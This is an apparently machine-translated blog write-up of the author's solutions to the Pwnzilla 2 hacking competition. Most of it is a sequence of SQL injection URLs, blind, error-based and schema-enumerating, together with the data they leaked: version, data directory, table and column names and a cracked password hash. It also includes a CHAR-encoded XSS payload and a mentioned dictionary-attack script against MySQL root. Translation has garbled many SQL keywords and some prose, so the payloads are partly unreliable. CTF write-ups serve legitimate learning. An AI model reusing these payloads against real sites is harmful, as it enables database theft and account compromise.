Após a conclusão da bem-sucedida competição Pwnzilla 2. Gostaria de expressar minha opinião e fornecer minhas próprias soluções, pois as competições mantêm você acordado e em pouco tempo você pode aprender muito devido à pressão do tempo.
No meu caso, em alguns dias aprendi muito sobre “Injeção cega de SQL“Mas também para criar um pequeno script python para ataque de senha do dicionário ao usuário ROOT[ Μήπως ήμουν τυχερός ? ].
Na página não havia apenas injeção SQL, mas também XSS, como você verá abaixo nos testes que fiz.
O modo de ataque não é diferente do modo como os hackers o usam, e esse é o significado dos penteados.
Antes de mais, gostaria de parabenizar o vencedor da competição Pwnzilla 2 George Spanos mas também aos organizadores que deveriam nos experimentar com mais frequência.
Na minha opinião, grandes páginas gregas antes de hospedar dados pessoais do usuário devem ser testadas, como foi feito no desafio Pwnzilla
O nível de competição era bastante alto porque os gerentes eram muito versados em ataques de injeção de SQL. Seus filtros bloquearam muitas palavras-chave (por exemplo, LOAD_FILE, INTO etc.)
– Alguém se pergunta por que ler e aprender injeção SQL e injeção cega quando existe o sqlmap?
Vamos olhar algumas das minhas soluções juntas
Obviamente, antes de chegar ao resultado desejado, tentei o seguinte sem êxito:
1)Trauma pós guerra
2)Divisão HTTP
3)Ataque de cabeçalho (Cookie, User-Agent, Host)
As ferramentas que eu usei foram Burp Suite, Wireshark
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(selecione db ()) 0509
// Comando SELECT negado ao usuário ‘n3wdb0wn3r2’ @ ‘localhost’ para a tabela ‘user’
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(selecione concat_ws (0x3a, usuário, senha) no mysql.user) 0509
// Nome da coluna duplicada ‘5.5.43-0 + deb7u1’
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(selecione * de (selecione name_const (versão (), 1), name_const (version (), 1)) a) 0509
// Retorna mais de uma linha
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(selecione nome do esquema em information_schema.schemata) 0509
// Injeção HTML – Frond end Attack
http: //pwnzilla.secnews.gr/pz2.php? id = `id` < (if(3>1, `
// Ataque MITM de resposta HTTP
No ataque a seguir, se o URL mudar, o usuário poderá ser transferido para o site do hacker ou baixar um programa malicioso do FTP.
Editar resposta
”/>
// bancos de dados (total = 2)
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if((SELECT count(*) FROM information_schema.schemata) > 2,1,2)) 0511
// tabelas (total = 41)
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if((SELECT count(*) FROM information_schema.tables) > 41,1,2)) 0511
// banco de dados versão 5.5.43
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(mid(@@version,1,1)>4,1,2)) 0511
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(mid(@@version,3,1)>4,1,2)) 0511
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(mid(@@version,5,1)>3,1,2)) 0511
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(mid(@@version,6,1)>2,1,2)) 0511
// Erro de sintaxe XPATH do diretório de dados: ‘/ var / lib / mysql /’
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(3>1, (selecione extrair valor (0, (selecione concat_ws (CHAR (47), CHAR (47), (selecione @@ datadir))))))), 3)) 0513
// Erro de sintaxe XPATH: ‘e85dd3-f97b-11e4-bf21-406186cbf1’ UUID [Web Server MAC Address]
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(3>1, (selecione extrair valor (0, (selecione concat_ws (CHAR (47), CHAR (47), (uuid ()))))))), 3)) 0513
// Ataque XSS
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(3>1, (selecione extrair valor (0, (selecione concat_ws (CHAR (47), CHAR (47))) (selecione concat_ws (caracter (95)), CHAR (60, 115, 99, 114, 105, 112, 116, 62, 97 , 108, 101, 114, 116, 40, 39, 88, 83, 83, 83, 39, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62), @@ hostname)))))) ), 3)) 0514
// Senha 23b59b78056e436fbfaeeb63ed03a443 Hash MD5 >>> pwner
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(3>1, (selecione extrair valor (0, (selecione concat_ws (CHAR (47), CHAR (47), (selecione group_concat (concat_ws (0x3a, substr (senha, 1,10), senha)) dos usuários))))), 3)) 0518
// Nome da coluna [offset 480-483]
Aqui eu brinquei um pouco com o deslocamento
http: //pwnzilla.secnews.gr/pz2.php? id = `id` <(if(3>1, (selecione extrair valor (0, (selecione concat_ws (CHAR (47), CHAR (47)), (selecione group_concat (concat_ws (0x3a, substr (senha, 1,2))), (SELECT concat_ws (0x3a, table_schema, table_name, column_name) ) do deslocamento de limite 1 de information_schema.columns 480))) dos usuários))))))), 3)) 0518
Erro de sintaxe XPATH: ‘: L02DB: pages: id’
Erro de sintaxe XPATH: ‘: L02DB: Páginas: Título’
Erro de sintaxe XPATH: ‘: L02DB: páginas: Conteúdo’
Erro de sintaxe XPATH: ‘: L02DB: páginas: autor’
// Nome da coluna [offset 484-486]
Erro de sintaxe XPATH: ‘: L02DB: users: id.’
Erro de sintaxe XPATH: ‘: L02DB: users: username’
Erro de sintaxe XPATH: ‘: L02DB: users: password’
Informações sobre a injeção avançada de SQL podem ser lidas aqui:
Script Python
Agora, sobre o script python, você pode baixá-lo em aquiÉ muito simples, eu já estou aprimorando-o personalizando o objeto. Crie uma lista de palavras, abra o programa com um bloco de anotações no ponto “Abrir arquivo”, corrija o Caminho. Veja wirehark o que acontece quando você executa o script.
Execução -> ./mysql_pass.py
Questão
Como você pode usá-lo Metasploit ou o Hidra para fazer esse ataque diretamente MYSQL; Você pode, se quiser responder aos comentários.